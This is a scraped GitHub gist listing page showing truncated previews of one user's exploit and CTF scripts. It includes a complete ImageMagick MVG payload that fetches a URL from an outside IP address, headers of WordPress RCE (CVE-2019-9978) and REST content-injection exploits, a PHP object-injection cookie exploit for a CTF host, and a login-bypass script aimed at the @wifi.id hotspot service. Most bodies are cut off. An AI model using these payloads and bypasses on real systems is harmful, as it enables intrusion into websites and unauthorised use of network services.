This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| push graphic-context | |
| viewbox 0 0 640 480 | |
| fill 'url(http://103.200.7.150:8070/wew)' | |
| pop graphic-context |
budanthara
/ CVE-2019-9978.py
Created
May 12, 2019 07:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) | |
| # Date: March, 2019 | |
| # Researcher: Luka Sikic | |
| # Exploit Author: hash3liZer | |
| # Download Link: https://wordpress.org/plugins/social-warfare/ | |
| # Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM | |
| # Github: https://github.com/hash3liZer/CVE-2019-9978 | |
| # Version: <=3D 3.5.2 | |
| # CVE: CVE-2019-9978 |
budanthara
/ wordpress_content_injection.py
Last active
July 8, 2024 14:42
Wordpress content injection exploit by snoww0lf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| """ | |
| Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
| REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post | |
| Wordpress Version Affected: 4.7.0/4.7.1 | |
| 2017 - Coded by snoww0lf. | |
| """ | |
| import re |
budanthara
/ web1_tumctf.py
Created
October 2, 2016 16:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| from urllib import quote_plus | |
| def main(): | |
| cookie = quote_plus('760463360e4919ca238d1566fc26661fa:1:{i:0;O:16:"GPLSourceBloater":1:{s:6:"source";s:8:"flag.php";}}') | |
| url = "http://104.154.70.126:10888/" | |
| req = requests.get(url, cookies=dict(todos=cookie)) | |
| print 'hxp{'+' '.join(re.findall(r'hxp{(.*?)}', req.text)[0].split(" "))+'}' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import mechanize | |
| import urllib | |
| import urllib2 | |
| import re | |
| import json | |
| def rand_gen_phone(): | |
| phone = '081' | |
| for i in range(9): |
budanthara
/ @wifi.id_bypass.py
Last active
December 27, 2022 13:30
Buat bypass autentikasi login @wifi.id
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| @WIFI.ID BYPASS WITH PYTHON | |
| Cara menggunakan: | |
| - Install python. | |
| - Install library mechanize. | |
| - Jalankan dengan perintah: python namafile.py | |
| - Tunggu dan silahkan mencoba untuk browsing. | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: python filename.py originalfile collisionfile | |
| # snoww0lf | |
| import sys | |
| from hashlib import * | |
| coll_find = [19, 45, 59, 83, 109, 123] | |
| d_out = [] | |
| def to_hex_conversion(data): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import string | |
| cipher = "233 129 9 5 130 194 195 39 75 229" | |
| def decode(): | |
| flag = "" | |
| strs = string.letters + "0123456789" + "{}_~*&^%$#@!()-" | |
| to_list = ' '.join(strs).split(' ') | |
| user_str = [] | |
| for char in strs: |
budanthara
/ bruteforce.py
Created
November 21, 2015 06:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| HackDatKiwi CTF 2015 - Phone Lock 1 | |
| """ | |
| import hashlib | |
| import random | |
| salt = "abb6f243fb340025d312c2a41cfa8beb" | |
| valid = "00a1e1072212ceae0445dcffde045da4" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def search(): | |
| flag = '' | |
| start = 'start.txt' | |
| st = True | |
| while st: | |
| with open(start, 'r') as f: | |
| x = f.readlines() | |
| c = x[0] | |
| start = c[6:].replace("\n", "") | |
| print "Membaca file %s " % (start) |
NewerOlder